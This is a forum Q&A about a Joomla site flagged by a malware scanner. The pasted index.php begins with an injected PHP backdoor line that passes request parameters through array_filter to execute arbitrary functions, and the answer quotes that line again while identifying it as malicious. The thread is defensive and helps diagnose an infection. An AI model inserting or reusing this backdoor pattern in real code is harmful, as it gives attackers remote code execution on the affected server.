# How to identify cause of SiteLock-PHP-EVAL_REQUEST-jki.UNOFFICIAL FOUND in my script?

Tags: php, joomla

So the result of a malware scan has returned this:

> /sanaciondelalma/sanaciondelalma/configuration.php:
>   SiteLock-PHP-EVAL_REQUEST-jki.UNOFFICIAL FOUND
>
> /sanaciondelalma/sanaciondelalma/index.php:
>   SiteLock-PHP-EVAL_REQUEST-jki.UNOFFICIAL FOUND
>
> /sanaciondelalma/sanaciondelalma/images/mod_config.php:
>   SiteLock-PHP-BACKDOOR-GENERIC-md5-efg.UNOFFICIAL FOUND
>
> /sanaciondelalma/sanaciondelalma/templates/atomic/error.php:
>   SiteLock-PHP-BACKDOOR-GENERIC-md5-wef.UNOFFICIAL FOUND
>
> /pablofaro/images/mod_config.php:
>   SiteLock-PHP-BACKDOOR-GENERIC-md5-efg.UNOFFICIAL FOUND

i dont know how to identify the cause within the script, here's the index one. could you please assist?

```
<?php
if ($_REQUEST['param1']&&$_REQUEST['param2']) {$f = $_REQUEST['param1']; $p = array($_REQUEST['param2']); $pf = array_filter($p, $f); echo 'OK'; Exit;}
/**
 * @package     Joomla.Site
 * @copyright   Copyright (C) 2005 - 2012 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

// Set flag that this is a parent file.
define('_JEXEC', 1);
define('DS', DIRECTORY_SEPARATOR);

if (file_exists(dirname(__FILE__) . '/defines.php')) {
    include_once dirname(__FILE__) . '/defines.php';
}

if (!defined('_JDEFINES')) {
    define('JPATH_BASE', dirname(__FILE__));
    require_once JPATH_BASE.'/includes/defines.php';
}

require_once JPATH_BASE.'/includes/framework.php';

// Mark afterLoad in the profiler.
JDEBUG ? $_PROFILER->mark('afterLoad') : null;

// Instantiate the application.
$app = JFactory::getApplication('site');

// Initialise the application.
$app->initialise();

// Mark afterIntialise in the profiler.
JDEBUG ? $_PROFILER->mark('afterInitialise') : null;

// Route the application.
$app->route();

// Mark afterRoute in the profiler.
JDEBUG ? $_PROFILER->mark('afterRoute') : null;

// Dispatch the application.
$app->dispatch();

// Mark afterDispatch in the profiler.
JDEBUG ? $_PROFILER->mark('afterDispatch') : null;

// Render the application.
$app->render();

// Mark afterRender in the profiler.
JDEBUG ? $_PROFILER->mark('afterRender') : null;

// Return the response.
echo $app;
```

Comment: Didint know, thank you!

Answer (score 0):

```
if ($_REQUEST['param1']&&$_REQUEST['param2']) 
    {
      $f = $_REQUEST['param1'];
      $p = array($_REQUEST['param2']);
      $pf = array_filter($p, $f); 
      echo 'OK'; Exit;
    }
```

This line right on top shouldn't exist

This is a wrapper code line that has been injected into your code by a malicious script

what you should imho

- Change all your passwords
- Make a clean install of your website and try to avoid using freeware templates and plugins from providers that are not registered in official joomla website

observe